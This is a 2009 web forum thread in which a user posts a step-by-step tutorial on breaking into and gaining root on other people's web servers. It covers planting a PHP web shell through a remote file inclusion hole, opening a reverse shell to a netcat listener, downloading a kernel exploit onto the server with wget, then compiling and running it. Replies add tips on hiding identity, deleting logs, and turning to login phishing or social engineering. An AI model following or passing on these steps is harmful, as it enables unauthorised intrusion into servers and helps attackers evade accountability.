 |
|
 |
 |
|
 |
IT Security and Insecurity Portal |
|
 |
Tutorial - Rooting A Webserver |
 |
 Posted: Sun May 10, 2009 9:16 am |
 |
|
| xF34Rx |
| Regular user |
 |
|
| Joined: May 10, 2009 |
| Posts: 23 |
|
|
|
 |
|
 |
|
What we need?
-RFI Vulnerable Script
-PHP Shell
-Netcat
-Brains
First of all, we need to get a shell on a site.Maybe i'll write a RFI Tutorial latter, for now just look it up on google.
For this tutorial i will be using MulCi Shell.
So, once you have it on a site, go to the 'Backdoor Host' tab and forward a port.
Now, go to the 'Back Connect' tab and insert the following settings:
1- Your IP Address.
2-The port you forwarded.
Now, go on CMD and type in:cd 'Path To Your Netcat.exe' and then you need to make netcat listen to the port you forwarded.To do this, type:nc -l -n -v -p port
It looked like this for me:
Microsoft Windows XP [Version 5.1.2600]
© Copyright 1985-2001 Microsoft Corp.
C:\FeAR>cd C:\
C:\>cd WINDOWS
C:\WINDOWS>nc -l -n -v -p 4444
listening on [any] 4444 ...
Now, when you have netcat listening to the port you forwarded, click 'Connect'.
When your connected, type 'whoami'.You shouldnt have root.
Now, to find an exploit to root the box, you need to know whats the kernel version.To do this, just type 'uname -a'.
It should look something like this:
| Code: | | Linux linux1.dmehosting.com 2.6.17-92.1.10.el5PAE #1 SMP Tue Aug 5 08:14:05 EDT 2008 i686 |
Now, we go on milw0rm.com and we will look for '2.6.17'.
| Code: | | http://milw0rm.com/exploits/5092 |
Now, we type 'wget http://milw0rm.com/exploits/5092' on the netcat window.
| Code: | | wget http://xpl_url.com |
So the exploit works, you must compile it in the server(gcc) and execute it via exploit(-o).
To do this we type 'gcc 5092 -o exploit'.
| Code: | | gcc 5092 -o exploit |
5092- After the url path.http://www.site.com/5092.
exploit- Output name.
Now you can execute your exploit by typing './exploit'
Wait for the exploit to finish running and type root again.
It should output in something like this:
| Code: | | uid=0(root) gid=0(root) groups=500(apache) |
This means you have successfully rooted the box  .
There are more ways to do this, this is the way I usually do it.
I took like, 1h 30m to write this so please, if you are going to leech this atleast give credit.
By xF34Rx.
Dedicated to Zero Burn & Team-1nj3ct.
Version 0.03 |
|
|
|
|
|
|
|
|
| Posted: Sat May 30, 2009 7:46 pm |
|
|
| mswannabe |
| Regular user |
 |
|
| Joined: May 30, 2009 |
| Posts: 8 |
|
|
|
|
|
|
|
| Thanks for taking the time to do this! However, how do you find the port number of a web site? Please bare with me. As mentioned i'm new to this and willing to learn. |
|
|
|
|
| Posted: Sat May 30, 2009 7:53 pm |
|
|
| xF34Rx |
| Regular user |
|
|
| Joined: May 10, 2009 |
| Posts: 23 |
|
|
|
|
|
|
|
| mswannabe wrote: | | Thanks for taking the time to do this! However, how do you find the port number of a web site? Please bare with me. As mentioned i'm new to this and willing to learn. |
You chose the port you want to back connect on.
Also, notice that if you use a router, you must port forward the port you chose, so the server can successfully back connect to you.
If your able to back connect, you have interactive shell access.Most kernels out there are outdated and easy to root, but if you cant find an exploit for that kernel version, you can always do login phishing or social engineering. |
|
|
|
|
| Posted: Sat May 30, 2009 8:18 pm |
|
|
| mswannabe |
| Regular user |
|
|
| Joined: May 30, 2009 |
| Posts: 8 |
|
|
|
|
|
|
|
| Hmmm thanks for the extra information. Where can I download this program? |
|
|
|
|
| Posted: Sat May 30, 2009 11:03 pm |
|
|
| mswannabe |
| Regular user |
|
|
| Joined: May 30, 2009 |
| Posts: 8 |
|
|
|
|
|
|
|
| One more question: do you need a proxy for accessing the back door? |
|
|
|
|
| Posted: Sun May 31, 2009 12:25 pm |
|
|
| xF34Rx |
| Regular user |
|
|
| Joined: May 10, 2009 |
| Posts: 23 |
|
|
|
|
|
|
|
| mswannabe wrote: | | Hmmm thanks for the extra information. Where can I download this program? |
Just google netcat.
| mswannabe wrote: | | One more question: do you need a proxy for accessing the back door? |
Not really, but you should always use one.
But, when back-connecting, you must give your real ip address.So either be very sure that your gonna get root privs and delete the logs, or use a shell account. |
|
|
|
|
| Posted: Sun May 31, 2009 4:45 pm |
|
|
| mswannabe |
| Regular user |
|
|
| Joined: May 30, 2009 |
| Posts: 8 |
|
|
|
|
|
|
|
| Hmm so if I have to give my real IP then that's liable to see that you're the person in the server right? |
|
|
|
|
| Posted: Tue Jun 02, 2009 2:54 pm |
|
|
| -AO- |
| Advanced user |
 |
|
| Joined: Jul 15, 2008 |
| Posts: 205 |
| Location: United States |
|
|
|
|
|
|
|
|
|
|
| Posted: Wed Jun 03, 2009 1:31 pm |
|
|
| Henderson |
| Valuable expert |
|
|
| Joined: Jul 11, 2008 |
| Posts: 58 |
|
|
|
|
|
|
|
|
|
|
|
| Posted: Wed Jun 03, 2009 6:49 pm |
|
|
| xF34Rx |
| Regular user |
|
|
| Joined: May 10, 2009 |
| Posts: 23 |
|
|
|
|
|
|
|
If its a big company, they can simply request the logs of your no-ip account. |
|
|
|
|
| Posted: Fri Jan 29, 2010 9:05 pm |
|
|
| Mooka91 |
| Advanced user |
|
|
| Joined: Aug 15, 2009 |
| Posts: 73 |
|
|
|
|
|
|
|
Overall good post.
Some improvements i may offer though, More screenshots to help those newbies, A list of Kernel exploits, Something that says, You need to forward your ports, Click here to find our how which links you to portforward.com.
Thats all i can think of off the top of my head ; ) |
|
|
|
|
| Posted: Tue Jul 27, 2010 6:09 am |
|
|
| ddexxters75 |
| Beginner |
|
|
| Joined: Jul 24, 2010 |
| Posts: 1 |
|
|
|
|
|
|
|
Thanks for taking the time to do this! However, how do you find the port number of a web site? Please bare with me. As mentioned i'm new to this and willing to learn.
____________________________
Excess Baggage
Container Shipping |
|
|
|
|
www.waraxe.us Forum Index -> Cooperation proposals
You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot vote in polls in this forum
|
All times are GMT
Page 1 of 1
|
|
|
|
Powered by phpBB © 2001-2008 phpBB Group
|
|
|
|
|
Discussions
Tools
Content
Info
Membership:
Latest: 
New Today: 0
New Yesterday: 0
Overall: 9144
People Online:
Visitors: 207
Members: 0
Total: 207
